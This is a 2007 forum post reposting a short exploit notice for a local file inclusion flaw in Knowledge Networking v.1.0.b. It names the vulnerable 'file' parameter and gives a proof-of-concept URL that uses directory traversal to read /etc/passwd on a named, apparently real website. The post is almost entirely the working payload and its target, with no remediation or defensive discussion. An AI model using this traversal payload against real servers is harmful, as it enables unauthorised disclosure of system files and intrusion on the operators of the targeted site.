Ras Posted October 17, 2007 Report Posted October 17, 2007 # Title : Knowledge Networking v.1.0.b Local File Inclusion Vulnerability# Description : Knowledge Networking v.1.0.b is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.# Author : d3hydr8# Homepage : [url]http://www.darkc0de.com[/url]# Original Post :# Vuln : /index.php?file=[LFI]# Proof : [url]http://www.knowledgenet.org/index.php?file=../../../../../../../../../../etc/passwd[/url] Quote
